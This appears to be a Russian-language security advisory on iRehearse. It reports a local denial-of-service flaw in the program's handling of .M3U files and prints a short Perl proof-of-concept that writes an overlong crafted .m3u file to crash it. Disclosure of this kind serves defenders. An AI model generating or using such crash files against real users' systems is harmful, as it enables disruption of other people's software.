Программа: iRehearse
Уязвимость позволяет локальному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных при
обработке .M3U файлов. Атакующий может передать специально сформированные файлы,
что приведет к отказу системы в обслуживании.
Эксплоит:
#!/usr/bin/perl
#iRehearse (m3u) local stack overlow POC
#finded by opt!x hacker <optix@9.cn>
#download : http://rjvmedia.co.uk/software/iRehearseTrial.zip
my $header="MILW0RM";
my $crash="A" x 40;
my $poc=$header.$crash;
open(myfile,'>>aidi.m3u');
print myfile $poc;
